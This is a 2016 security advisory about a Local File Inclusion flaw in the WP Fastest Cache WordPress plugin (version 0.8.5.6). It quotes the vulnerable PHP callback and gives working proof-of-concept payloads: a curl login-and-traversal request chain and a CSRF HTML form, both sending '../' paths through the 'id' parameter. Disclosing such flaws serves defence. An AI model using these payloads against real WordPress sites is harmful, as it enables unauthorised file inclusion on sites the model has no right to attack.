WP Fastest Cache [Local File Inclusion]
Description
Plugin WP Fastest Cache registers the AJAX action
wpfc_cdn_template_ajax_request which is vulnerable to Local File
Inclusion attack.
This action is a privileged one so it is only available to registered users.
Vulnerable parameter is id.
The same vulnerability can be exploited by performing a CSRF attack because there is no CSRF protection implemented. This could allow even unregistered users to exploit it.
Vulnerable code:
file: wp-fastest-cache/wpFastestCache.php
public function wpfc_cdn_template_ajax_request_callback(){
ob_start();
include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
$content = ob_get_contents();
ob_end_clean();
$res = array("success" => false, "content" => "");
if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){
$res["success"] = true;
$res["content"] = $content;
}
echo json_encode($res);
exit;
}
PoC
Authenticated
curl -XPOST 'http://sbwp1.dev/wp-login.php' \
-d 'log=subscriber&pwd=password&wp-submit=Log+In' \
-c '/tmp/Pan' \
& curl -XPOST 'http://sbwp1.dev/wp-admin/admin-ajax.php' \
-d 'action=wpfc_cdn_template_ajax_request&id=../update_error' \
-b '/tmp/Pan'
CSRF
<form action="http://sbwp1.dev/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
<input type="hidden" name="id" value="../update_error" />
<input type="submit" value="Submit form" />
</form>
INFO
- 26 April 2016
- Pan Vag
- www.wpfastestcache.com
- WP Fastest Cache
- 0.8.5.6
- WordPress 4.5
- DWF-2016-87028